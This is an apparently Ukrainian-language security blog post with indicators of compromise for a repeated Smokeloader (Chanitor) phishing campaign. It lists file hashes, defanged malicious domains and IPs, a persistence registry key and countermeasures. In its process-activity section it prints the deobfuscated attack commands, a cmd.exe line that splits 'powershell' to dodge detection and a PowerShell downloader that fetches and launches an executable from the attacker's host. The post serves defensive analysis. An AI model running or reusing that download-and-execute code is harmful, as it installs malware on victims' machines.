IOC_smokeldr_060218

Доброго дня, панове.

Вчора було зафіксовано повторну спробу доставки троянського коду типу Smokeloader (Chanitor).

Розсилка на 90% наслідує те, що ми вже бачили 30го числа.

Користувачі захисту кінцевих точок McAfee зверніть увагу як етектується dropper:

Трохи аналітики:

  • Доставка – через обфусковані JS скрипти оболонці RAR
  • Скрипт містить одну чітко вказану адресу, а основна частина записується з чітко заданим іменем файлу
  • Був використаний той же скрипт та ім’я сайту з минулої розсилки
  • Завантаження основної частини відбувається не через WSH, а засобами Powershell
  • Запуск шкідливого коду не потребує прав Адміністратора

Схема атаки:

email > Attach (RAR) > JS > single hardcoded URL > GET > %temp%\63753.exe (минулого разу - 5541.exe)

Маркери IOC:

Приєднання (архів):

File name   сканирование гарантійний лист 05_02_2018.rar
SHA-256        6fde3aba8453cef14486e1446debaa7b19f321d9f1e7965bc8516478e5de905f
File size      77.89 KB

скрипт приманка:

File name   гарантійний лист 05_02_18р.xls.js
SHA-256        1d183616452133674366777206b102d234adf351829f4e5bb89079dd235d7930
File size      18.57 KB

основна частина:

File name   crsse.exe >> 63753.exe
SHA-256        f02281510c40d71893e000b4d1e11327e2eb76e999df23ba6876e7162eae5144
File size      281.5 KB

Мережеві IOC:

завантаження payload – досі активна!

104.31.86.241    enterwords[.]ru   GET /uadoc/crsse.exe HTTP/1.1

трафік скомпрометованої системи – сервер контролю

104.27.140.34    honeyindoc[.]ru  POST / HTTP/1.1  (application/x-www-form-urlencoded)

Активність по процесам:

Запуск скрипта-приманки ініціює завантаження основної частини засобами Powershell

Порівняння деобфускованих команд із розсилки за 30те число:

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\гарантійний лист 05_02_18р.xls.js"

"C:\Windows\System32\cmd.exe" /k set _a1=pow&& set _a2=ersh&& set _a3=ell&& call %_a1%%_a2%%_a3% $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\63753.exe';$http_request.open('GET', 'h11p://enterwords[.]ru/uadoc/crsse.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

powershell  $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\63753.exe';$http_request.open('GET', 'h11p://enterwords[.]ru/uadoc/crsse.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

"C:\tmp\63753.exe"

C:\Windows\SysWOW64\explorer.exe

Закріплення через HCU

HKEY_USERS\S-1-5-21-136527031-2493574210-1221074019-1000\Software\Microsoft\Windows\CurrentVersion\Run
C:\Users\operator\AppData\Roaming\Microsoft\tjerrirf

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Заборона вихідних мережевих зєднань для процесів Powershell
  • Заборона виклику Powershell через WSCript – додатково захистить від скриптів що йдуть як OLE об’єкти
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR
Advertisements

Tags: , , , , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: